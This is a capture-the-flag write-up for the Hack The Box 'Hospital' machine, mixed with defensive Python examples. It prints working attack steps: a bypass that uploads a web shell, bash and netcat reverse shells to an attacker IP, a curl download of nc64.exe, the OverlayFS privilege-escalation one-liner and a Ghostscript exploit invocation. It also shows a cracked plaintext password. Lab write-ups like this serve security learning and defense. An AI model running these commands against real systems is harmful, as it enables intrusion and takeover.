HTB - Hospital

A writeup of the HTB Hospital box

Hospital

Reconnaissance

Port Scanning

[atao@Arch ~/Hospital]$ rustscan -a 10.10.11.241
...
Open 10.10.11.241:53
Open 10.10.11.241:22
Open 10.10.11.241:88
Open 10.10.11.241:139
Open 10.10.11.241:135
Open 10.10.11.241:389
Open 10.10.11.241:445
Open 10.10.11.241:464
Open 10.10.11.241:443
Open 10.10.11.241:593
Open 10.10.11.241:636
Open 10.10.11.241:1801
Open 10.10.11.241:2103
Open 10.10.11.241:2105
Open 10.10.11.241:2107
Open 10.10.11.241:2179
Open 10.10.11.241:3389
Open 10.10.11.241:5985
Open 10.10.11.241:6406
Open 10.10.11.241:6409
Open 10.10.11.241:6404
Open 10.10.11.241:6407
Open 10.10.11.241:6616
Open 10.10.11.241:6635
Open 10.10.11.241:6644
Open 10.10.11.241:8080
Open 10.10.11.241:9389
...

We see many open ports, and some are really interesting:

  • 139 / 445 : SMB
  • 88 : KDC
  • 135 : LDAP
  • 443 : HTTP
  • 8080 : HTTP

So we know the machine is an Active Directory Domain Controller because port 88 (Kerberos) is open; we can also see an HTTP service running, maybe for the foothold?

User

First user

We start on port 443 but don't find anything special, so let's move on to 8080.

There is an upload feature, so let's try uploading something.

The site only accepts images, so we have to bypass this. Setting the Content-Type HTTP header to image/png does the trick. I'm going to use p0wny-shell.

It's uploaded to /uploads/file_name
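The bypass works because the server trusts the Content-Type header the client sends. As an added example (my own code, not the box's PHP or p0wny-shell), here is the server-side check a defender would want instead: it uses the declared type only as a consistency check and decides from the file name and the file's own bytes. The function names and the sample payloads are constructed for illustration.

```python
"""Upload validation that does not trust the client-supplied Content-Type.

Added example, not code from the Hospital box or from p0wny-shell; the
function names and the sample payloads below are constructed for illustration.
"""
import os

# Magic bytes a genuine file must start with -> (MIME type, accepted extensions)
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": ("image/png", {".png"}),
    b"\xff\xd8\xff": ("image/jpeg", {".jpg", ".jpeg"}),
    b"GIF87a": ("image/gif", {".gif"}),
    b"GIF89a": ("image/gif", {".gif"}),
}

# Extensions a PHP web server may hand to the interpreter, wherever they sit in the name
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "htaccess"}

# PHP open tags; their presence anywhere in an "image" means it is a polyglot
PHP_TAGS = (b"<?php", b"<?=")


def sniff_image(data: bytes):
    """Return (mime, allowed_extensions) from the leading bytes, or None."""
    for magic, info in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return info
    return None


def validate_upload(filename: str, declared_type: str, data: bytes):
    """Return (accepted, reason). The Content-Type header is checked only for
    consistency; the decision rests on the file name and the file's own bytes."""
    name = os.path.basename(filename)
    if name != filename or not name or name.startswith("."):
        return False, "path components or hidden file name rejected"
    segments = name.lower().split(".")
    if any(seg in SCRIPT_EXTS for seg in segments[1:]):
        return False, "script extension present in file name"
    ext = "." + segments[-1] if len(segments) > 1 else ""
    sniffed = sniff_image(data)
    if sniffed is None:
        return False, "content is not a recognised image format"
    mime, allowed_exts = sniffed
    if ext not in allowed_exts:
        return False, f"extension {ext!r} does not match sniffed type {mime}"
    if declared_type.split(";")[0].strip().lower() != mime:
        return False, f"declared Content-Type {declared_type!r} disagrees with content"
    if any(tag in data for tag in PHP_TAGS):
        return False, "PHP open tag found inside image data"
    return True, "ok"


# Constructed samples: a minimal PNG header with padding, and a PHP file
# that merely declares itself image/png, as in the bypass described above.
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_STUB = b"<?php /* script body */ ?>"

if __name__ == "__main__":
    for args in [("avatar.png", "image/png", PNG_STUB),
                 ("shell.php", "image/png", PHP_STUB),
                 ("pic.php.png", "image/png", PNG_STUB),
                 ("pic.png", "image/png", PNG_STUB + PHP_STUB)]:
        print(args[0], validate_upload(*args))
```

Pair the check with an uploads directory where the web server does not execute scripts at all, since any validator can be fooled by a format it does not know.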

Got my reverse shell like this:
/usr/bin/bash -c "bash -i >& /dev/tcp/10.10.14.8/12345 0>&1"

Fake root

We spawn as www-data, so we are going to do some lateral movement. Inside config.php we find MySQL credentials, so let's connect to the database and hope to find something interesting.

Now we have to find the algorithm of these hashes; we find it in register.php, and it's bcrypt because:

password_hash($password, PASSWORD_DEFAULT); # -> It's bcrypt
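PASSWORD_DEFAULT currently means bcrypt in PHP, with a cost of 10 unless the application passes a higher one, and the stored string starts with $2y$. The following audit helper is an added example, not code from the box: it parses stored hashes and flags low cost factors. The sample hash is constructed with a valid layout and is not a real digest. Note that the cost only slows guessing; a weak password falls regardless, so the real control is the password policy.

```python
"""Audit stored password hashes produced by PHP's password_hash().

Added example, not code from the Hospital box; the sample hash is constructed
(valid bcrypt layout, not a real digest) and the function names are my own.
"""
import re

# Modular-crypt layout emitted by password_hash($p, PASSWORD_DEFAULT):
# $2y$<cost>$<22-char salt><31-char digest>, alphabet [./A-Za-z0-9]
BCRYPT_RE = re.compile(r"^\$(2[aby])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")


def parse_bcrypt(stored: str):
    """Split a bcrypt string into its fields, or return None if it is not bcrypt."""
    m = BCRYPT_RE.match(stored)
    if not m:
        return None
    return {"variant": m.group(1), "cost": int(m.group(2)),
            "salt": m.group(3), "digest": m.group(4)}


def audit_hash(stored: str, min_cost: int = 12):
    """Classify a stored hash as 'ok', 'weak cost ...', or 'not bcrypt'."""
    info = parse_bcrypt(stored)
    if info is None:
        return "not bcrypt"  # e.g. unsalted MD5/SHA-1, which should be migrated
    if info["cost"] < min_cost:
        return f"weak cost {info['cost']} (2^{info['cost']} rounds), want >= {min_cost}"
    return "ok"


# Constructed sample with PHP's default cost of 10; the salt/digest characters
# are placeholders with the right length and alphabet, not a real hash.
SAMPLE_HASH = "$2y$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234"

if __name__ == "__main__":
    print(parse_bcrypt(SAMPLE_HASH))
    print(audit_hash(SAMPLE_HASH))
```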

After cracking these hashes, I log in on the previous web server, but nothing has changed. So I go back to my shell and start searching for a CVE to privesc, and I find CVE-2023-2640. So let's exploit it:

www-data@webserver:/var/www/html$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
root@webserver:/var/www/html# 
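From the defender's side, the command above is noisy: an unprivileged user creating a user namespace, mounting an overlay and setting a file capability in a single shell line. As an added example (not part of the writeup), here is a small scanner that scores command lines from a shell-history or audit feed on those indicators; the log lines and their user/cmd= layout are constructed and do not follow a real auditd format.

```python
"""Flag shell commands that combine the ingredients of the OverlayFS
user-namespace privilege escalation (CVE-2023-2640) in audit or history logs.

Added example, not code from the Hospital box; the log lines are constructed
and the field layout (user cmd=...) is my own, not a real auditd format.
"""
import re

# Each indicator alone is common admin activity; several together in one
# command line from an unprivileged user is what warrants a look.
INDICATORS = {
    "unshare_userns": re.compile(r"\bunshare\b\s+(?:-\S*r|--map-root-user|--user)"),
    "overlay_mount": re.compile(r"\bmount\b\s+-t\s+overlay\b"),
    "setcap_setuid": re.compile(r"\bsetcap\b.*cap_setuid"),
    "suid_bit": re.compile(r"\bchmod\b\s+[0-7]?4[0-7]{3}\b"),
}


def score_command(cmd: str):
    """Return the sorted names of indicators present in one command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))


def flag_overlay_privesc(lines, min_indicators=2):
    """Return [(line_no, user, indicators)] for lines with >= min_indicators hits."""
    hits = []
    for i, line in enumerate(lines):
        m = re.match(r"(?P<user>\S+)\s+cmd=(?P<cmd>.*)", line)
        if not m:
            continue
        found = score_command(m.group("cmd"))
        if len(found) >= min_indicators:
            hits.append((i, m.group("user"), found))
    return hits


# Constructed sample lines (not a real log). Line 0 condenses the pattern seen
# in the writeup above; line 1 is a legitimate root overlay mount (one
# indicator, not flagged); the rest are routine activity.
SAMPLE_LOG = [
    'www-data cmd=unshare -rm sh -c "setcap cap_setuid+eip l/python3; mount -t overlay overlay -o lowerdir=l,upperdir=u,workdir=w m"',
    "root cmd=mount -t overlay overlay -o lowerdir=/a,upperdir=/b,workdir=/c /merged",
    "alice cmd=ls -la /var/www/html",
    "bob cmd=chmod 4755 /var/tmp/bash",
]

if __name__ == "__main__":
    for hit in flag_overlay_privesc(SAMPLE_LOG):
        print(hit)
```

The mitigation is a patched kernel; the detection is for the window before the patch lands, and on Ubuntu-family kernels restricting unprivileged user namespaces removes the first ingredient.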

Real user

But still no user.txt, so let's pivot. I grab the hashes in /etc/shadow and try these passwords on other services (maybe the HTTP on port 443).
So we found: drwilliams:qwe123!@#
We try it on https://hospital.htb and it worked!

We have a mail in our mailbox; it tells us that the files we send to drbrown will be executed by Ghostscript, so we're going to find a CVE in Ghostscript: CVE-2023-36664

With this PoC: https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection we are able to execute commands.
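CVE-2023-36664 is a permission-validation flaw in how Ghostscript handles pipe device file names (the %pipe% prefix), so a defender whose workflow renders EPS attachments automatically can at least screen them for such references before Ghostscript sees them. The following pre-screen is an added example, not the linked PoC or code from the box; the sample documents are constructed and the function names are my own.

```python
"""Pre-screen PostScript/EPS input for pipe-device references before it
reaches Ghostscript (the vector of CVE-2023-36664).

Added example, not code from the Hospital box or the linked PoC; the sample
documents are constructed and the function names are my own.
"""
import re

# File names beginning with %pipe% or | are treated as commands by
# Ghostscript's pipe device; a legitimate document has no reason to use them.
PIPE_PATTERNS = [
    ("pipe_device", re.compile(rb"%pipe%", re.IGNORECASE)),
    ("pipe_prefix", re.compile(rb"\(\s*\|")),          # string literal starting with |
    ("output_file_redirect", re.compile(rb"OutputFile\s*\(")),
]


def scan_postscript(data: bytes):
    """Return a list of (finding, byte_offset) for suspicious constructs."""
    findings = []
    for name, rx in PIPE_PATTERNS:
        for m in rx.finditer(data):
            findings.append((name, m.start()))
    return findings


def is_safe_to_render(data: bytes) -> bool:
    """Accept only input with a PostScript header and no pipe references."""
    return data.startswith(b"%!PS") and not scan_postscript(data)


# Constructed samples: a harmless EPS stub and one carrying a pipe reference
# (a placeholder token, not a working payload).
BENIGN_EPS = (b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 100 100\n"
              b"0 0 moveto 100 100 lineto stroke\nshowpage\n")
SUSPICIOUS_EPS = (b"%!PS-Adobe-3.0 EPSF-3.0\n"
                  b"% constructed: file name token using the pipe prefix\n"
                  b"(%pipe%PLACEHOLDER)\nshowpage\n")

if __name__ == "__main__":
    print("benign:", is_safe_to_render(BENIGN_EPS), scan_postscript(BENIGN_EPS))
    print("suspicious:", is_safe_to_render(SUSPICIOUS_EPS), scan_postscript(SUSPICIOUS_EPS))
```

This is a compensating control for untrusted attachments; the fix is updating Ghostscript. The pipe_prefix pattern can false-positive on a legitimate string literal that starts with |, so treat hits as a reason to quarantine rather than an automatic verdict.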

[atao@Arch ~/Hospital]$ python3 CVE_2023_36664_exploit.py --generate --filename revshell --payload "curl 10.10.14.8:8000/nc64.exe -o nc.exe" -x eps
[atao@Arch ~/Hospital]$ python3 CVE_2023_36664_exploit.py --generate --filename revshell --payload "nc.exe 10.10.14.8 12345 -e cmd.exe" -x eps

We get our shell and can get the user.txt

C:\Users\drbrown.HOSPITAL\Documents>type ..\Desktop\user.txt
4b820619299704c2a307ae37b5205771

Root

We have write rights on the C:\xampp\htdocs directory, which is the root directory for the webmail. We can try to upload p0wny-shell one more time, and BOOM, a root shell.